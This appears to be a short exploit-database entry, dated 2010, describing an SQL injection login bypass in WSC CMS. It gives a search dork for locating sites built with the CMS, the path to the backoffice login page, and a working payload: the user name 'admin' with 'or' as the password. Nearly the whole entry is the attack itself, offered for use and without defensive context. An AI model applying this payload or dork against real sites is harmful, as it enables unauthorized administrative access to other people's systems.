id: 10981
date: 02/19/2010
title: WSC CMS (Bypass) SQL Injection Vulnerability
author: Phenom
cves: 

============================================
WSC CMS (Bypass) SQL Injection Vulnerability
============================================

############### WSC CMS (Bypass) SQL Injection Vulnerability ###################################
#
#       Author : Phenom
#
#       Dork : Realizzato con WSC CMS  by Dynamicsoft
#
################################################################################################
 
####### Exploit ################################################################################
#
#     1- http://server/public/backoffice
#
#     2- login with "admin" as user name and 'or' as password
#
################################################################################################



#  0day.today [2023-03-23]  #